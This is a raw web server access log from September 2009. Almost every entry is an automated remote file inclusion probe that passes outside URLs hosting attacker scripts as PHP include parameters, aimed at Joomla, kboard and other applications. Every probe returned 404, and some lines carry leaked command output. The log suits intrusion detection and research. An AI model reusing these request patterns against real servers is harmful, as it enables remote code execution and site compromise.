64.6.232.171 - - [08/Sep/2009:04:21:14 -0500] "GET /logs/become_editor.php?theme_path=http://kpu.feelmuziq.com/comm/attach/perkosa.txt??? HTTP/1.1" 404 305 "-""libwww-perl/5.805"
64.6.232.171 - - [08/Sep/2009:04:21:14 -0500] "GET /become_editor.php?theme_path=http://kpu.feelmuziq.com/comm/attach/perkosa.txt??? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
77.221.130.4 - - [08/Sep/2009:04:22:47 -0500] "GET /logs/access_log.1241222400%20//include/admin.lib.inc.php?site_path=http://shanghaisisa.com/skin/rfi.txt??? HTTP/1.1" 404 337 "-""libwww-perl/5.805"
77.221.130.4 - - [08/Sep/2009:04:23:00 -0500] "GET /logs/access_log.1241222400%20//include/admin.lib.inc.php?site_path=http://shanghaisisa.com/skin/rfi.txt??? HTTP/1.1" 404 337 "-""libwww-perl/5.805"
203.185.129.45 - - [08/Sep/2009:04:23:43 -0500] "GET /logs/access_log.1235260800/errors.php?error=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 320 "-""Mozilla/5.0"
203.185.129.45 - - [08/Sep/2009:04:23:45 -0500] "GET /logs/access_log.1235260800/errors.php?error=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 320 "-""Mozilla/5.0"
199.120.90.223 - - [08/Sep/2009:04:24:18 -0500] "GET /logs/access_log.1246752000//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://shanghaisisa.com/skin/id1.txt? HTTP/1.1" 404 361 "-""Mozilla/5.0"
216.65.20.79 - - [08/Sep/2009:04:27:40 -0500] "GET /logs/access_log.1232755200//tools/send_reminders.php?includedir=http://www.ssp.co.id/admin/admin/id.txt???? HTTP/1.1" 404 335 "-""libwww-perl/5.814"
216.65.20.79 - - [08/Sep/2009:04:27:40 -0500] "GET /logs//tools/send_reminders.php?includedir=http://www.ssp.co.id/admin/admin/id.txt???? HTTP/1.1" 404 313 "-""libwww-perl/5.814"
216.65.20.79 - - [08/Sep/2009:04:27:40 -0500] "GET //tools/send_reminders.php?includedir=http://www.ssp.co.id/admin/admin/id.txt???? HTTP/1.1" 404 308 "-""libwww-perl/5.814"
219.85.63.226 - - [08/Sep/2009:04:30:45 -0500] "GET /logs///config/dbutil.bck.php?confdir=http://newenglandclubcleaners.com//ID.txt?? HTTP/1.1" 404 311 "-""libwww-perl/5.805"
219.85.63.226 - - [08/Sep/2009:04:30:45 -0500] "GET /logs/access_log.1232755200///config/dbutil.bck.php?confdir=http://newenglandclubcleaners.com//ID.txt?? HTTP/1.1" 404 333 "-""libwww-perl/5.805"
219.85.63.226 - - [08/Sep/2009:04:30:45 -0500] "GET ///config/dbutil.bck.php?confdir=http://newenglandclubcleaners.com//ID.txt?? HTTP/1.1" 404 306 "-""libwww-perl/5.805"
65.55.106.187 - - [08/Sep/2009:04:31:03 -0500] "GET /logs/access_log.1185148800 HTTP/1.0" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
200.192.131.74 - - [08/Sep/2009:04:36:06 -0500] "GET /logs/access_log.1237334400///config/dbutil.bck.php?confdir=http://shanghaisisa.com/skin/rfi.txt???? HTTP/1.1" 404 333 "-""libwww-perl/5.79"
200.192.131.74 - - [08/Sep/2009:04:36:06 -0500] "GET ///config/dbutil.bck.php?confdir=http://shanghaisisa.com/skin/rfi.txt???? HTTP/1.1" 404 306 "-""libwww-perl/5.79"
219.85.63.226 - - [08/Sep/2009:04:40:04 -0500] "GET /logs/access_log.1237334400///config/dbutil.bck.php?confdir=http://mayainfo.co.cc/cmd.txt?? HTTP/1.1" 404 333 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
219.85.63.226 - - [08/Sep/2009:04:40:04 -0500] "GET ///config/dbutil.bck.php?confdir=http://mayainfo.co.cc/cmd.txt?? HTTP/1.1" 404 306 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
219.85.63.226 - - [08/Sep/2009:04:40:05 -0500] "GET /logs///config/dbutil.bck.php?confdir=http://mayainfo.co.cc/cmd.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
74.86.17.106 - - [08/Sep/2009:04:40:55 -0500] "GET //include/footer.php?_path[counter]=http://sampnode.co.za/mambots/editors/baner.txt?? HTTP/1.1" 404 302 "-""Mozilla/5.0"
74.86.17.106 - - [08/Sep/2009:04:40:55 -0500] "GET /logs/access_log.1242518400//include/footer.php?_path[counter]=http://sampnode.co.za/mambots/editors/baner.txt?? HTTP/1.1" 404 329 "-""Mozilla/5.0"
74.86.17.106 - - [08/Sep/2009:04:40:55 -0500] "GET /logs//include/footer.php?_path[counter]=http://sampnode.co.za/mambots/editors/baner.txt?? HTTP/1.1" 404 307 "-""Mozilla/5.0"
66.207.172.166 - - [08/Sep/2009:04:41:16 -0500] "GET /logs/access_log.1228608000//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://sampnode.co.za/mambots/editors/baner.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
66.207.172.166 - - [08/Sep/2009:04:41:16 -0500] "GET //kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://sampnode.co.za/mambots/editors/baner.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
66.207.172.166 - - [08/Sep/2009:04:41:16 -0500] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://sampnode.co.za/mambots/editors/baner.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
82.146.119.209 - - [08/Sep/2009:04:41:40 -0500] "GET /logs//_conf/core/common-tpl-vars.php?confdir=http://daloisio.org/nqowg/fx29id.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
82.146.119.209 - - [08/Sep/2009:04:41:40 -0500] "GET /logs/access_log.1241481600//_conf/core/common-tpl-vars.php?confdir=http://daloisio.org/nqowg/fx29id.txt?? HTTP/1.1" 404 341 "-""Mozilla/5.0"
82.146.119.209 - - [08/Sep/2009:04:41:40 -0500] "GET //_conf/core/common-tpl-vars.php?confdir=http://daloisio.org/nqowg/fx29id.txt?? HTTP/1.1" 404 314 "-""Mozilla/5.0"
82.146.119.209 - - [08/Sep/2009:04:41:57 -0500] "GET /logs/access_log.1240272000//_conf/core/common-tpl-vars.php?confdir=http://daloisio.org/nqowg/fx29id.txt?? HTTP/1.1" 404 341 "-""Mozilla/5.0"
65.55.106.183 - - [08/Sep/2009:04:42:07 -0500] "GET /logs/access_log.1118361600 HTTP/1.0" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
200.192.131.74 - - [08/Sep/2009:04:42:15 -0500] "GET ///config/dbutil.bck.php?confdir=http://shanghaisisa.com/skin/rfi.txt???? HTTP/1.1" 404 306 "-""libwww-perl/5.79"
66.207.172.166 - - [08/Sep/2009:04:42:37 -0500] "GET /logs/access_log.1228608000%20%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://sampnode.co.za/mambots/editors/baner.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
208.64.216.6 - - [08/Sep/2009:04:42:41 -0500] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://sampnode.co.za/mambots/editors/baner.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
208.64.216.6 - - [08/Sep/2009:04:42:41 -0500] "GET //kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://sampnode.co.za/mambots/editors/baner.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
208.64.216.6 - - [08/Sep/2009:04:42:41 -0500] "GET /logs/access_log.1228608000//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://sampnode.co.za/mambots/editors/baner.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
208.64.216.6 - - [08/Sep/2009:04:45:06 -0500] "GET /logs/access_log.1228608000%20%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://sampnode.co.za/mambots/editors/baner.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
65.38.188.164 - - [08/Sep/2009:04:46:06 -0500] "GET /logs/access_log.1238803200///appserv/main.php?appserv_root=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 328 "-""Mozilla/5.0"
65.38.188.164 - - [08/Sep/2009:04:46:06 -0500] "GET /logs///appserv/main.php?appserv_root=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 306 "-""Mozilla/5.0"
190.144.44.36 - - [08/Sep/2009:04:46:55 -0500] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=uid=48(apache)%20gid=48(apache)%20groups=48(apache),502(fundacionliceomoderno.edu.co),503(ietatanasiogirardot.edu.co),504(acomil),505(colegiodelpilargirardot),506(colmilitarreyes.edu.co),507(colmilitarliceomoderno),508(colmilitarnarino),509(gruposigma),510(soft-pos)%0A? HTTP/1.1" 404 340 "-""libwww-perl/5.79"
190.144.44.36 - - [08/Sep/2009:04:46:55 -0500] "GET ///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=uid=48(apache)%20gid=48(apache)%20groups=48(apache),502(fundacionliceomoderno.edu.co),503(ietatanasiogirardot.edu.co),504(acomil),505(colegiodelpilargirardot),506(colmilitarreyes.edu.co),507(colmilitarliceomoderno),508(colmilitarnarino),509(gruposigma),510(soft-pos)%0A? HTTP/1.1" 404 335 "-""libwww-perl/5.79"
190.144.44.36 - - [08/Sep/2009:04:47:16 -0500] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=uid=48(apache)%20gid=48(apache)%20groups=48(apache),502(fundacionliceomoderno.edu.co),503(ietatanasiogirardot.edu.co),504(acomil),505(colegiodelpilargirardot),506(colmilitarreyes.edu.co),507(colmilitarliceomoderno),508(colmilitarnarino),509(gruposigma),510(soft-pos)%0A? HTTP/1.1" 404 340 "-""libwww-perl/5.79"
190.144.44.36 - - [08/Sep/2009:04:47:16 -0500] "GET ///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=uid=48(apache)%20gid=48(apache)%20groups=48(apache),502(fundacionliceomoderno.edu.co),503(ietatanasiogirardot.edu.co),504(acomil),505(colegiodelpilargirardot),506(colmilitarreyes.edu.co),507(colmilitarliceomoderno),508(colmilitarnarino),509(gruposigma),510(soft-pos)%0A? HTTP/1.1" 404 335 "-""libwww-perl/5.79"
219.85.63.226 - - [08/Sep/2009:04:47:20 -0500] "GET ///config/dbutil.bck.php?confdir=http://mayainfo.co.cc/cmd.txt?? HTTP/1.1" 404 306 "-""libwww-perl/5.805"
64.6.232.171 - - [08/Sep/2009:04:47:36 -0500] "GET /webanalyse/words.php?action=delNoise&word=to//faqsupport/samplefaqsupport.php?path[docroot]=http://kpu.feelmuziq.com/comm/attach/perkosa.txt??? HTTP/1.1" 404 303 "-""libwww-perl/5.805"
64.6.232.171 - - [08/Sep/2009:04:47:36 -0500] "GET /logs/webanalyse/words.php?action=delNoise&word=to//faqsupport/samplefaqsupport.php?path[docroot]=http://kpu.feelmuziq.com/comm/attach/perkosa.txt??? HTTP/1.1" 404 308 "-""libwww-perl/5.805"
64.6.232.171 - - [08/Sep/2009:04:47:54 -0500] "GET /logs/webanalyse/words.php?action=delNoise&word=to//faqsupport/samplefaqsupport.php?path[docroot]=http://kpu.feelmuziq.com/comm/attach/perkosa.txt??? HTTP/1.1" 404 308 "-""libwww-perl/5.805"
64.6.232.171 - - [08/Sep/2009:04:47:54 -0500] "GET /webanalyse/words.php?action=delNoise&word=to//faqsupport/samplefaqsupport.php?path[docroot]=http://kpu.feelmuziq.com/comm/attach/perkosa.txt??? HTTP/1.1" 404 303 "-""libwww-perl/5.805"
70.90.108.169 - - [08/Sep/2009:04:47:58 -0500] "GET /index.php?redir=http://www.frostbytes.com/regina/copyright.txt?? HTTP/1.1" 404 292 "-""Mozilla/5.0"
70.90.108.169 - - [08/Sep/2009:04:47:58 -0500] "GET /logs/index.php?redir=http://www.frostbytes.com/regina/copyright.txt?? HTTP/1.1" 404 297 "-""Mozilla/5.0"
70.90.108.169 - - [08/Sep/2009:04:47:58 -0500] "GET /logs/access_log.1246579200/index.php?redir=http://www.frostbytes.com/regina/copyright.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
218.27.203.107 - - [08/Sep/2009:04:49:13 -0500] "GET /logs/access_log.1238803200///appserv/main.php?appserv_root=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 328 "-""Mozilla/5.0"
218.27.203.107 - - [08/Sep/2009:04:49:13 -0500] "GET /logs///appserv/main.php?appserv_root=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 306 "-""Mozilla/5.0"
128.177.11.182 - - [08/Sep/2009:04:49:15 -0500] "GET //kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.scss.sk//plugins/baner.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
128.177.11.182 - - [08/Sep/2009:04:49:15 -0500] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.scss.sk//plugins/baner.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
128.177.11.182 - - [08/Sep/2009:04:49:15 -0500] "GET /logs/access_log.1228608000//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.scss.sk//plugins/baner.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
211.189.18.73 - - [08/Sep/2009:04:49:34 -0500] "GET /logs//errors.php?DOCUMENT_ROOT=http://shanghaisisa.com/chboard/images/id1.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
211.189.18.73 - - [08/Sep/2009:04:49:34 -0500] "GET //errors.php?DOCUMENT_ROOT=http://shanghaisisa.com/chboard/images/id1.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
211.189.18.73 - - [08/Sep/2009:04:49:34 -0500] "GET /logs/access_log.1237420800//errors.php?DOCUMENT_ROOT=http://shanghaisisa.com/chboard/images/id1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
211.189.18.73 - - [08/Sep/2009:04:49:55 -0500] "GET //errors.php?DOCUMENT_ROOT=http://shanghaisisa.com/chboard/images/id1.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
211.189.18.73 - - [08/Sep/2009:04:49:55 -0500] "GET /logs//errors.php?DOCUMENT_ROOT=http://shanghaisisa.com/chboard/images/id1.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
128.177.11.182 - - [08/Sep/2009:04:50:09 -0500] "GET //kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.annunci-motori.it/baner.txt??? HTTP/1.1" 404 294 "-""Mozilla/5.0"
128.177.11.182 - - [08/Sep/2009:04:50:09 -0500] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.annunci-motori.it/baner.txt??? HTTP/1.1" 404 299 "-""Mozilla/5.0"
128.177.11.182 - - [08/Sep/2009:04:50:09 -0500] "GET /logs/access_log.1228608000//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.annunci-motori.it/baner.txt??? HTTP/1.1" 404 321 "-""Mozilla/5.0"
128.177.11.182 - - [08/Sep/2009:04:52:51 -0500] "GET /logs/access_log.1228608000%20%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.annunci-motori.it/baner.txt??? HTTP/1.1" 404 323 "-""Mozilla/5.0"
128.177.11.182 - - [08/Sep/2009:04:52:54 -0500] "GET /logs/access_log.1228608000%20%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.scss.sk//plugins/baner.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
70.90.108.169 - - [08/Sep/2009:04:52:59 -0500] "GET /index.php?redir=http://www.frostbytes.com/regina/copyright.txt?? HTTP/1.1" 404 292 "-""Mozilla/5.0"
70.90.108.169 - - [08/Sep/2009:04:52:59 -0500] "GET /logs/index.php?redir=http://www.frostbytes.com/regina/copyright.txt?? HTTP/1.1" 404 297 "-""Mozilla/5.0"
70.90.108.169 - - [08/Sep/2009:04:52:59 -0500] "GET /logs/access_log.1246579200/index.php?redir=http://www.frostbytes.com/regina/copyright.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
70.90.108.169 - - [08/Sep/2009:04:53:07 -0500] "GET /logs/access_log.1247270400/index.php?redir=http://www.frostbytes.com/regina/copyright.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
200.192.131.74 - - [08/Sep/2009:04:54:33 -0500] "GET /logs/access_log.1232755200///config/dbutil.bck.php?confdir=http://shanghaisisa.com/skin/rfi.txt???? HTTP/1.1" 404 333 "-""libwww-perl/5.79"
200.192.131.74 - - [08/Sep/2009:04:54:34 -0500] "GET ///config/dbutil.bck.php?confdir=http://shanghaisisa.com/skin/rfi.txt???? HTTP/1.1" 404 306 "-""libwww-perl/5.79"
200.192.131.74 - - [08/Sep/2009:04:54:34 -0500] "GET /logs///config/dbutil.bck.php?confdir=http://shanghaisisa.com/skin/rfi.txt???? HTTP/1.1" 404 311 "-""libwww-perl/5.79"
218.38.136.251 - - [08/Sep/2009:04:56:10 -0500] "GET /kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://www.wdiet.co.kr/img/file/dot.gif?? HTTP/1.1" 404 293 "-""libwww-perl/5.65"
218.38.136.251 - - [08/Sep/2009:04:56:12 -0500] "GET //kboard/kboard.php?board=free&act=http://www.wdiet.co.kr/img/file/dot.gif?? HTTP/1.1" 404 301 "-""libwww-perl/5.65"
222.73.17.7 - - [08/Sep/2009:04:57:19 -0500] "GET /errors.php?error=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 293 "-""Mozilla/5.0"
222.73.17.7 - - [08/Sep/2009:04:57:19 -0500] "GET /logs/errors.php?error=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 298 "-""Mozilla/5.0"
222.73.17.7 - - [08/Sep/2009:04:57:19 -0500] "GET /logs/access_log.1237075200/errors.php?error=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 320 "-""Mozilla/5.0"
222.73.17.7 - - [08/Sep/2009:04:57:41 -0500] "GET /errors.php?error=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 293 "-""Mozilla/5.0"
222.73.17.7 - - [08/Sep/2009:04:57:41 -0500] "GET /logs/errors.php?error=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 298 "-""Mozilla/5.0"
222.73.17.7 - - [08/Sep/2009:04:57:41 -0500] "GET /logs/access_log.1230249600/errors.php?error=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 320 "-""Mozilla/5.0"
222.73.17.7 - - [08/Sep/2009:04:57:52 -0500] "GET /logs/access_log.1229990400/errors.php?error=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 320 "-""Mozilla/5.0"
66.90.115.6 - - [08/Sep/2009:04:57:56 -0500] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://gn.fileave.com/id1.txt? HTTP/1.1" 404 317 "-""Mozilla/5.0"
66.90.115.6 - - [08/Sep/2009:04:57:56 -0500] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://gn.fileave.com/id1.txt? HTTP/1.1" 404 322 "-""Mozilla/5.0"
66.90.115.6 - - [08/Sep/2009:04:57:56 -0500] "GET /logs/access_log.1247011200/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://gn.fileave.com/id1.txt? HTTP/1.1" 404 344 "-""Mozilla/5.0"
66.90.115.6 - - [08/Sep/2009:04:57:56 -0500] "GET /logs/access_log.1243814400/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://gn.fileave.com/id1.txt? HTTP/1.1" 404 344 "-""Mozilla/5.0"
65.55.106.134 - - [08/Sep/2009:04:58:02 -0500] "GET /logs/access_log.1221091200 HTTP/1.0" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
222.73.17.7 - - [08/Sep/2009:04:58:27 -0500] "GET /logs/access_log.1228348800/errors.php?error=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 320 "-""Mozilla/5.0"
222.73.17.7 - - [08/Sep/2009:04:58:44 -0500] "GET /logs/access_log.1235347200/errors.php?error=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 320 "-""Mozilla/5.0"
222.73.17.7 - - [08/Sep/2009:04:58:48 -0500] "GET /logs/errors.php?error=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 298 "-""Mozilla/5.0"
222.73.17.7 - - [08/Sep/2009:04:58:48 -0500] "GET /errors.php?error=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 293 "-""Mozilla/5.0"
222.73.17.7 - - [08/Sep/2009:04:58:48 -0500] "GET /logs/access_log.1237075200/errors.php?error=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 320 "-""Mozilla/5.0"
222.73.17.7 - - [08/Sep/2009:04:59:51 -0500] "GET /logs/access_log.1228348800/errors.php?error=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 320 "-""Mozilla/5.0"
222.73.17.7 - - [08/Sep/2009:05:00:27 -0500] "GET /logs/access_log.1235347200/errors.php?error=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 320 "-""Mozilla/5.0"
94.136.37.141 - - [08/Sep/2009:05:00:44 -0500] "GET /logs/bb_lib/checkdb.inc.php?libpach=http://www.standrewkimchicago.org/bbs/data/daegun/mildfx.txt??? HTTP/1.1" 404 310 "-""libwww-perl/5.803"
94.136.37.141 - - [08/Sep/2009:05:00:44 -0500] "GET /bb_lib/checkdb.inc.php?libpach=http://www.standrewkimchicago.org/bbs/data/daegun/mildfx.txt??? HTTP/1.1" 404 305 "-""libwww-perl/5.803"
218.38.136.251 - - [08/Sep/2009:05:00:44 -0500] "GET /kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://www.wdiet.co.kr/img/file/dot.gif?? HTTP/1.1" 404 293 "-""libwww-perl/5.65"
218.38.136.251 - - [08/Sep/2009:05:00:47 -0500] "GET //kboard/kboard.php?board=free&act=http://www.wdiet.co.kr/img/file/dot.gif?? HTTP/1.1" 404 301 "-""libwww-perl/5.65"
219.85.63.226 - - [08/Sep/2009:05:01:37 -0500] "GET //lire.php?rub=http://newenglandclubcleaners.com//ID.txt?? HTTP/1.1" 404 292 "-""libwww-perl/5.805"
219.85.63.226 - - [08/Sep/2009:05:01:37 -0500] "GET /logs//lire.php?rub=http://newenglandclubcleaners.com//ID.txt?? HTTP/1.1" 404 297 "-""libwww-perl/5.805"
82.146.119.209 - - [08/Sep/2009:05:02:35 -0500] "GET /logs//ea-gBook/index_inc.php?inc_ordner=http://daloisio.org/nqowg/fx29id.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
82.146.119.209 - - [08/Sep/2009:05:02:35 -0500] "GET //ea-gBook/index_inc.php?inc_ordner=http://daloisio.org/nqowg/fx29id.txt?? HTTP/1.1" 404 306 "-""Mozilla/5.0"
82.146.119.209 - - [08/Sep/2009:05:02:35 -0500] "GET /logs/access_log.1247270400//ea-gBook/index_inc.php?inc_ordner=http://daloisio.org/nqowg/fx29id.txt?? HTTP/1.1" 404 333 "-""Mozilla/5.0"
94.136.37.141 - - [08/Sep/2009:05:02:57 -0500] "GET /logs/bb_lib/checkdb.inc.php?libpach=http://www.standrewkimchicago.org/bbs/data/daegun/mildfx.txt??? HTTP/1.1" 404 310 "-""libwww-perl/5.803"
94.136.37.141 - - [08/Sep/2009:05:02:57 -0500] "GET /bb_lib/checkdb.inc.php?libpach=http://www.standrewkimchicago.org/bbs/data/daegun/mildfx.txt??? HTTP/1.1" 404 305 "-""libwww-perl/5.803"
94.136.37.141 - - [08/Sep/2009:05:04:19 -0500] "GET /logs/access_log.1243987200/bb_lib/checkdb.inc.php?libpach=http://www.standrewkimchicago.org/bbs/data/daegun/sx1.txt?? HTTP/1.1" 404 332 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5"
94.136.37.141 - - [08/Sep/2009:05:04:19 -0500] "GET /bb_lib/checkdb.inc.php?libpach=http://www.standrewkimchicago.org/bbs/data/daegun/sx1.txt?? HTTP/1.1" 404 305 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5"
94.136.37.141 - - [08/Sep/2009:05:04:19 -0500] "GET /logs/bb_lib/checkdb.inc.php?libpach=http://www.standrewkimchicago.org/bbs/data/daegun/sx1.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5"
94.136.37.141 - - [08/Sep/2009:05:04:25 -0500] "GET /logs/bb_lib/checkdb.inc.php?libpach=http://business.hongik.ac.kr/~business/bbs/data/gall/fx29id1.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
94.136.37.141 - - [08/Sep/2009:05:04:25 -0500] "GET /bb_lib/checkdb.inc.php?libpach=http://business.hongik.ac.kr/~business/bbs/data/gall/fx29id1.txt?? HTTP/1.1" 404 305 "-""Mozilla/5.0"
94.136.37.141 - - [08/Sep/2009:05:04:25 -0500] "GET /logs/access_log.1243987200/bb_lib/checkdb.inc.php?libpach=http://business.hongik.ac.kr/~business/bbs/data/gall/fx29id1.txt?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
94.136.37.141 - - [08/Sep/2009:05:04:32 -0500] "GET /bb_lib/checkdb.inc.php?libpach=http://ta-photo.com/templates/Varages/mild.txt??? HTTP/1.1" 404 305 "-""libwww-perl/5.803"
94.136.37.141 - - [08/Sep/2009:05:04:32 -0500] "GET /logs/bb_lib/checkdb.inc.php?libpach=http://ta-photo.com/templates/Varages/mild.txt??? HTTP/1.1" 404 310 "-""libwww-perl/5.803"
94.136.37.141 - - [08/Sep/2009:05:04:33 -0500] "GET /bb_lib/checkdb.inc.php?libpach=http://ta-photo.com/templates/Varages/mild.txt??? HTTP/1.1" 404 305 "-""libwww-perl/5.803"
94.136.37.141 - - [08/Sep/2009:05:04:33 -0500] "GET /logs/bb_lib/checkdb.inc.php?libpach=http://ta-photo.com/templates/Varages/mild.txt??? HTTP/1.1" 404 310 "-""libwww-perl/5.803"
94.136.37.141 - - [08/Sep/2009:05:04:33 -0500] "GET /logs/access_log.1238112000/bb_lib/checkdb.inc.php?libpach=http://business.hongik.ac.kr/~business/bbs/data/gall/fx29id1.txt?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
218.38.136.251 - - [08/Sep/2009:05:05:01 -0500] "GET /logs//kboard/kboard.php?board=free&act=http://www.wdiet.co.kr/img/file/dot.gif?? HTTP/1.1" 404 306 "-""libwww-perl/5.65"
218.38.136.251 - - [08/Sep/2009:05:05:01 -0500] "GET //kboard/kboard.php?board=free&act=http://www.wdiet.co.kr/img/file/dot.gif?? HTTP/1.1" 404 301 "-""libwww-perl/5.65"
94.136.37.141 - - [08/Sep/2009:05:05:08 -0500] "GET /logs/access_log.1238112000/bb_lib/checkdb.inc.php?libpach=http://www.standrewkimchicago.org/bbs/data/daegun/sx1.txt?? HTTP/1.1" 404 332 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b"
94.136.37.141 - - [08/Sep/2009:05:05:08 -0500] "GET /bb_lib/checkdb.inc.php?libpach=http://www.standrewkimchicago.org/bbs/data/daegun/sx1.txt?? HTTP/1.1" 404 305 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b"
94.136.37.141 - - [08/Sep/2009:05:05:09 -0500] "GET /logs/bb_lib/checkdb.inc.php?libpach=http://www.standrewkimchicago.org/bbs/data/daegun/sx1.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b"
94.136.37.141 - - [08/Sep/2009:05:05:11 -0500] "GET /logs/bb_lib/checkdb.inc.php?libpach=http://www.standrewkimchicago.org/bbs/data/daegun/sx1.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5"
94.136.37.141 - - [08/Sep/2009:05:05:11 -0500] "GET /logs/access_log.1238112000/bb_lib/checkdb.inc.php?libpach=http://www.standrewkimchicago.org/bbs/data/daegun/sx1.txt?? HTTP/1.1" 404 332 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5"
